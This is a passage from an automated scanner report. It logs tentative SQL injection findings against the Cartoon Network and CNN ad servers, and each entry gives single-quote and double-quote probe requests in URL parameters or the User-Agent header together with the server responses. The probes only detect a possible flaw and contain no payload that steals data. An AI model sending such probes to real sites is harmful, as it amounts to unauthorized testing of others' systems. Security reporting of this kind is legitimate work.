1.2. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:56 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:56 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:56 GMT
Content-Type: text/html


1.3. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:57 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:57 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:57 GMT
Content-Type: text/html


1.4. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage&params.styles=fs&tile=3795625302921&domId=114568
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:55 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage&params.styles=fs&tile=3795625302921&domId=114568
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:55 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:55 GMT
Content-Type: text/html


1.5. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=97279 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279 HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1

Response 1

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:46:02 GMT
Server: Apache
AdServer: ads1ad22:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Sat, 11 Dec 2010 02:46:02 GMT
Pragma: no-cache
Content-Length: 6194
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');

document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.8")))\n');

document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279 HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:46:03 GMT
Server: Apache
AdServer: ads1ad22:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Sat, 11 Dec 2010 02:46:03 GMT
Pragma: no-cache
Content-Length: 3077
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

1.6. http://ads.cnn.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:52:01 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/www.cartoonnetwork.com/games/index.html/
Expires: Sat, 11 Dec 2010 02:52:01 GMT
Connection: close
Content-Type: text/html


1.7. http://ads.cnn.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/www.cartoonnetwork.com/video/index.html/
Expires: Sat, 11 Dec 2010 03:02:46 GMT
Connection: close
Content-Type: text/html


1.8. http://ads.cnn.com/event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru]

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:54 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:54 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/[ewclickthru]
Expires: Sat, 11 Dec 2010 03:02:54 GMT
Connection: close
Content-Type: text/html


1.9. http://ads.cnn.com/event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cnn.com
Path:   /event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
